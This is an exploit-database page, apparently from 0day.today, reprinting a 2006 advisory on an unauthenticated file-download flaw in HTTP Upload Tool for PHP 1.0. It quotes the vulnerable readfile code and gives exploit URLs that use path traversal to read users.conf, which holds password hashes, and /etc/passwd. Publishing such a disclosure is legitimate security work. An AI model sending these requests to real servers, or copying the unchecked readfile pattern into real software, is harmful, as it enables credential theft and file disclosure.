[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HTTP Upload Tool (download.php) Information Disclosure Vulnerability

Author
Craig Heffner
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1170
Category
web applications
Date add
16-11-2006
Platform
unsorted
====================================================================
HTTP Upload Tool (download.php) Information Disclosure Vulnerability
====================================================================



#######################################################################################
# Target:
#
#       HTTP Upload Tool For PHP 1.0
#       http://uploadtool.sourceforge.net/
#
# Vulnerability:
#
#       Information disclosure
#
# Description:
#
#       The download.php file in Upload Tool for PHP neither verifies that a
#       requestor has authenticated, nor performs any sanity checking on the file
#       being requested. This allows an unauthenticated user to download any file
#       which the web server has read rights to, including the users.conf file which
#       contains a list of Upload Tool's users and their hashed passwords.
#
# Vulnerable Code (truncated):
#
#       $filename = $_GET['filename'];
#       readfile("$filename");
#
# Exploit:
#
#       http://www.examplesite.com/upload/bin/download.php?filename=../conf/users.conf
#       http://www.examplesite.com/upload/bin/download.php?filename=/etc/passwd
#
# Discovered:
#
#       Craig Heffner
######################################################################################



#  0day.today [2024-12-25]  #